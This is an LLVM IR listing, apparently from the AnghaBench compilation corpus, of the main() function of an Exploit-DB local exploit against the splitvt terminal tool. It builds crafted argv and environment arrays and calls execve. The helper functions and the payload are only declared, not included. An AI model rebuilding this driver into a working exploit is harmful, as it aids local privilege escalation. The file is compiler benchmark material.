; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_260.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_260.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_4__ = type { i32* }

@eat = common dso_local global i32 0, align 4
@aos_envp = common dso_local global %struct.TYPE_4__ zeroinitializer, align 8
@.str = private unnamed_addr constant [11 x i8] c"TERM=vt100\00", align 1
@aos_argv = common dso_local global %struct.TYPE_4__ zeroinitializer, align 8
@SPLITVT = common dso_local global i8* null, align 8
@.str.1 = private unnamed_addr constant [7 x i8] c"-upper\00", align 1
@COMMAND = common dso_local global i8* null, align 8
@.str.2 = private unnamed_addr constant [7 x i8] c"-lower\00", align 1
@.str.3 = private unnamed_addr constant [8 x i8] c"-rcfile\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %6 = load i32, i32* %4, align 4
  %7 = icmp ne i32 %6, 2
  br i1 %7, label %8, label %9

8:                                                ; preds = %2
  store i32 -1, i32* %3, align 4
  br label %44

9:                                                ; preds = %2
  %10 = load i8**, i8*** %5, align 8
  %11 = getelementptr inbounds i8*, i8** %10, i64 1
  %12 = load i8*, i8** %11, align 8
  %13 = call i32 @strtoul(i8* %12, i32* null, i32 0)
  store i32 %13, i32* @eat, align 4
  %14 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_envp, i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str, i64 0, i64 0))
  %15 = call i64 (...) @home()
  %16 = icmp ne i64 %15, 0
  br i1 %16, label %17, label %18

17:                                               ; preds = %9
  store i32 -1, i32* %3, align 4
  br label %44

18:                                               ; preds = %9
  %19 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_envp, i8* null)
  %20 = load i8*, i8** @SPLITVT, align 8
  %21 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_argv, i8* %20)
  %22 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_argv, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.1, i64 0, i64 0))
  %23 = load i8*, i8** @COMMAND, align 8
  %24 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_argv, i8* %23)
  %25 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_argv, i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.2, i64 0, i64 0))
  %26 = load i8*, i8** @COMMAND, align 8
  %27 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_argv, i8* %26)
  %28 = call i64 (...) @shell()
  %29 = icmp ne i64 %28, 0
  br i1 %29, label %30, label %31

30:                                               ; preds = %18
  store i32 -1, i32* %3, align 4
  br label %44

31:                                               ; preds = %18
  %32 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_argv, i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.3, i64 0, i64 0))
  %33 = call i64 (...) @file()
  %34 = icmp ne i64 %33, 0
  br i1 %34, label %35, label %36

35:                                               ; preds = %31
  store i32 -1, i32* %3, align 4
  br label %44

36:                                               ; preds = %31
  %37 = call i32 @array_of_strings(%struct.TYPE_4__* @aos_argv, i8* null)
  %38 = load i32*, i32** getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @aos_argv, i32 0, i32 0), align 8
  %39 = getelementptr inbounds i32, i32* %38, i64 0
  %40 = load i32, i32* %39, align 4
  %41 = load i32*, i32** getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @aos_argv, i32 0, i32 0), align 8
  %42 = load i32*, i32** getelementptr inbounds (%struct.TYPE_4__, %struct.TYPE_4__* @aos_envp, i32 0, i32 0), align 8
  %43 = call i32 @execve(i32 %40, i32* %41, i32* %42)
  store i32 -1, i32* %3, align 4
  br label %44

44:                                               ; preds = %36, %35, %30, %17, %8
  %45 = load i32, i32* %3, align 4
  ret i32 %45
}

declare dso_local i32 @strtoul(i8*, i32*, i32) #1

declare dso_local i32 @array_of_strings(%struct.TYPE_4__*, i8*) #1

declare dso_local i64 @home(...) #1

declare dso_local i64 @shell(...) #1

declare dso_local i64 @file(...) #1

declare dso_local i32 @execve(i32, i32*, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
